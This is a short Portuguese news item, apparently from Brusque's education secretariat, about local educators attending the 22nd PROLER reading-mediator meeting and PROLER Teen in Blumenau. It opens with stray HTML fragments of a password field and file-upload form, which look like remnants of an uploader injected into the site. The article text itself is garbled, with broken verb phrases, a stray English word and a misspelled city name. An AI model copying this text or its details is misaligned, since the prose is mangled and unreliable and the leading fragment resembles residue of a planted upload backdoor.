POST>PASSWORD: CHECKBOX NAME="F[]" VALUE=" "_upl" value="Upload" name="uploader" id="uploader" EDUCADORES DE BRUSQUE PARTICIPAM DO 22º PROLER E 2º PROLER TEEN EM BLUMENAL – Secretaria de Educação de Brusque
Weather:
HomeNOTÍCIASEDUCADORES DE BRUSQUE PARTICIPAM DO 22º PROLER E 2º PROLER TEEN EM BLUMENAL

EDUCADORES DE BRUSQUE PARTICIPAM DO 22º PROLER E 2º PROLER TEEN EM BLUMENAL

Um grupo de 42 educadores de Brusque participaram fazê 22º Encontro Regional do PROLER – Ciclos de Palestras e 2º PROLER adolescente, that aconteceram Nos dias 15, 16, 22 e 23 de maio, em Blumenau.

O evento foi organizado pelo Comitê Regional do Proler, no qual a Secretaria de Educação de Brusque é representada pela Coordenadora de Bibliotecas Escolares Mara Cristina Huppes, que tem como objetivo ampliar o conhecimento dos profissionais que atuam como mediadores de leitura. A Secretaria de Educação disponibilizou o transporte, incentivando, assim, a formação continuada do seu quadro de educadores.

O PROLER tem tradição em formação de mediadores de leitura. Os palestrantes foram: Josiane Geroldi – “Oralidade: memórias, pesquisa e afetividade”, Carlos H. Schroeder – “Geografia Aérea: espaços da literatura”, André Neves – “A leitura nos livros para infância” e Magda Teixeira Chagas – “biblioteca Escolar: o que é preciso mudar”